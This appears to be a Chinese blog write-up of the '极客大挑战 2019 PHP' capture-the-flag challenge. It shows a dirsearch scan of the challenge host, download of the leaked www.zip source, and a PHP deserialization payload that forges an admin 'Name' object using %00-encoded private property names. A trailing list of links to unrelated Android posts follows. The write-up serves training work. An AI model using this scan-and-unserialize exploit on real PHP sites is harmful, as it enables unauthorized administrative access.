[极客大挑战 2019]PHP1

worker..2024-08-02 22:30

打开题目

游戏界面

猜测php里面有文件,我们可以用dirsearch 扫描一下这个服务器

执行命令

dirsearch -u http://2999dfd5-1d43-4a81-a088-9e41c9dccab4.node4.buuoj.cn/ -e php > test.log

最后在log文件中找到一个 200 www.zip

浏览器输入payload下载下来

得到目录文件

解读一下php代码,进行反序列化

payload

?select=O:4:"Name":3:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}

但是发现这个里面有空格,所以把空格url编码变成%00再传参

Payload:

/?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

相关推荐
jzlhll1234 小时前
android MVC/MVP/MVVM/MVI架构发展历程和编写范式
android·架构
安卓开发者4 小时前
Android ConstraintLayout 使用详解
android
CV资深专家8 小时前
Android 基础入门学习目录(持续更新)
android
侧耳4298 小时前
android添加i2c-tools工具
android
我是好小孩12 小时前
Android-侧边导航栏的使用
android·gitee
吗喽对你问好12 小时前
安卓基础布局核心知识点整理
android·gitee
安卓开发者12 小时前
Android Material Components 全面解析:打造现代化 Material Design 应用
android
教程分享大师12 小时前
带root权限_中国移动创维DT541_S905L3融合机器改机顶盒刷机教程 当贝纯净版安卓9.0系统线刷包 刷机包
android
wuk99812 小时前
Android:UI:Drawable:View/ImageView与Drawable
android·ui
whysqwhw13 小时前
Kotlin 中作用域函数 let、with、run、also、apply 的核心使用指南
android
热门推荐
01Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code02全球最强模型Grok4,国内已可免费使用!(附教程)03VMware Workstation Pro虚拟机的下载和安装图文保姆级教程(附下载链接)04MSPM0G3507——读取引脚的高低电平方法(数字信号循迹模块)05KGG转MP3工具|非KGM文件|解密音频062025电赛e题:openmv识别过程丢失矩形07腾讯还是太全面了,限时免费!超全CodeBuddy IDE保姆级教程!(附案例)08Coze 开源了,送上保姆级私有化部署方案【建议收藏】09UV安装并设置国内源102025年电子设计大赛G题《电路模型探究装置》各小问数学推导及个人思路